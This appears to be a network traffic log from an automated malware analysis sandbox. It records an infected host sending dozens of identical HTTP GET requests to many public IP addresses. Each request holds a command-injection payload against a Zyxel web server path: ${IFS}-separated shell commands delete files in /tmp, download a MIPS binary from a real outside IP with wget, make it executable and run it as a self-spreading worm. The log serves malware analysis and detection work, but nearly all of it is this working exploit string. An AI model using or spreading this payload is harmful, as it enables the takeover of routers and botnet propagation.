                                                Jan 12, 2024 18:24:46.113599062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7120192.168.2.133582457.197.112.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113615990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7121192.168.2.134345287.38.58.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113672018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7122192.168.2.1337474161.237.86.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113718033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7123192.168.2.134005682.187.99.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113751888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7124192.168.2.133805631.162.67.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113809109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7125192.168.2.1346956163.42.206.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113851070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7126192.168.2.134222041.121.49.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113882065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7127192.168.2.134848625.159.177.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113908052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7128192.168.2.1339626197.175.162.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113945961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7129192.168.2.1354992178.246.117.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113984108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7130192.168.2.1346998220.176.237.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.114015102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7131192.168.2.135542644.23.216.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.114042044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7132192.168.2.1356676219.194.228.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.114078045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7133192.168.2.1348338190.247.148.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.114144087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7134192.168.2.1336392218.47.95.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.114171982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7135192.168.2.135233420.117.138.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.114209890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7136192.168.2.1339882202.236.143.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.114258051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7137192.168.2.1338958106.113.179.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.114278078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7138192.168.2.13591408.40.200.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118041992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7139192.168.2.1337272131.155.199.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118067026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7140192.168.2.1336554134.146.227.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118115902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7141192.168.2.1347190110.35.101.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118164062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7142192.168.2.1343312161.30.150.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118197918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7143192.168.2.1347624172.86.35.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118263006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7144192.168.2.1349474119.149.194.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118287086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7145192.168.2.133656693.104.139.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118313074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7146192.168.2.135366251.218.89.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118369102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7147192.168.2.1334394159.136.130.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118392944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7148192.168.2.1345502190.88.35.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118428946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7149192.168.2.1342576137.162.248.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118480921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7150192.168.2.134669285.79.123.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118505955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7151192.168.2.1333614118.47.90.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118557930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7152192.168.2.1360412146.106.245.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118587971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7153192.168.2.1345416186.210.46.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.118629932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7154192.168.2.134961898.221.241.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134174109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7155192.168.2.1354146181.38.102.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134253979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7156192.168.2.1335754109.89.30.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134336948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7157192.168.2.1352212156.77.116.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134375095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7158192.168.2.133481688.61.182.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134438992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7159192.168.2.1354206159.64.132.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134488106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7160192.168.2.1360822161.222.198.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134562969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7161192.168.2.1335962126.207.227.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134622097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7162192.168.2.1339136207.162.208.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134676933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7163192.168.2.1342184188.239.36.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134728909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7164192.168.2.1340124119.144.6.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134782076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7165192.168.2.1356622134.237.73.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134830952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7166192.168.2.133722674.106.220.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134888887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7167192.168.2.1339412161.34.16.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134937048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7168192.168.2.134228223.1.66.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.134994984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7169192.168.2.1333986134.116.37.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135040045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7170192.168.2.1333804169.127.107.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135094881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7171192.168.2.134301253.149.103.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135155916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7172192.168.2.1336098102.86.121.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135205984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7173192.168.2.1344614209.154.187.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135260105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7174192.168.2.135247836.239.133.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135319948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7175192.168.2.1355370208.50.116.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135385990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7176192.168.2.1346826152.194.148.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135442972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7177192.168.2.134120479.200.164.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135500908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7178192.168.2.134613077.7.206.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135554075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7179192.168.2.135308077.168.93.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135617971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7180192.168.2.1344186204.66.95.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135656118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7181192.168.2.1351878196.44.94.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135699034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7182192.168.2.1348250139.230.240.226443
                                                TimestampBytes transferredDirectionData
